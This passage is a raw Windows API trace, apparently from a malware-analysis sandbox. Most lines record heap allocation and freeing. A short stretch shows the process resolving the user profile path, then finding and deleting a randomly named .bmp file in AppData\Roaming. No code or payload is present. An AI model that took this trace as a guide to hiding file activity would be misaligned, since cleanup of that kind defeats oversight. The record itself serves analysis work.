hHeap=0x25c0000) returned 1 [0190.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa098 [0190.651] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0190.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0190.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0190.652] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b10b8 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa098 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0190.652] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d00 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1898 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1818 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0190.653] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cd8 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa008 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b70 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17c8 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa188 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0190.654] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24d7a58 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1808 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0190.655] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.656] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.656] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0190.656] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.656] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa170 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.657] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.657] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.657] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.658] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0190.658] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/5fNAF_eBT37aF.bmp", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5fNAF_eBT37aF.bmp", lpFilePart=0x8bedfc*="5fNAF_eBT37aF.bmp") returned 0x3f [0190.658] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0190.658] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5fNAF_eBT37aF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5fnaf_ebt37af.bmp")) returned 0x2020 [0190.658] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5fNAF_eBT37aF.bmp", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e4023a0, ftCreationTime.dwHighDateTime=0x1d4d428, ftLastAccessTime.dwLowDateTime=0xc4185b80, ftLastAccessTime.dwHighDateTime=0x1d4d569, ftLastWriteTime.dwLowDateTime=0xc4185b80, ftLastWriteTime.dwHighDateTime=0x1d4d569, nFileSizeHigh=0x0, nFileSizeLow=0xd7f5, dwReserved0=0x836, dwReserved1=0x4, cFileName="5fNAF_eBT37aF.bmp", cAlternateFileName="5FNAF_~1.BMP")) returned 0xaa5860 [0190.659] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5fNAF_eBT37aF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5fnaf_ebt37af.bmp")) returned 1 [0190.660] FindNextFileW (in: hFindFile=0xaa5860, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7e4023a0, ftCreationTime.dwHighDateTime=0x1d4d428, ftLastAccessTime.dwLowDateTime=0xc4185b80, ftLastAccessTime.dwHighDateTime=0x1d4d569, ftLastWriteTime.dwLowDateTime=0xc4185b80, ftLastWriteTime.dwHighDateTime=0x1d4d569, nFileSizeHigh=0x0, nFileSizeLow=0xd7f5, dwReserved0=0x836, dwReserved1=0x4, cFileName="5fNAF_eBT37aF.bmp", cAlternateFileName="5FNAF_~1.BMP")) returned 0 [0190.660] FindClose (in: hFindFile=0xaa5860 | out: hFindFile=0xaa5860) returned 1 [0190.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa260 | out: hHeap=0x25c0000) returned 1 [0190.661] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa260 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0190.661] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa140 [0190.661] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa170 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa1d0 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.662] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa170 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0190.662] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa278 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0190.663] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa218 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa218 | out: hHeap=0x25c0000) returned 1 [0190.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa278 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0190.664] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x80) returned 0x24f1fe0 [0190.664] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz/AppData/Roaming/5fNAF_eBT37aF.bmp", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5fNAF_eBT37aF.bmp", lpFilePart=0x8bf658*="5fNAF_eBT37aF.bmp") returned 0x3f [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0190.664] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5fNAF_eBT37aF.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5fnaf_ebt37af.bmp")) returned 0xffffffff [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0190.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 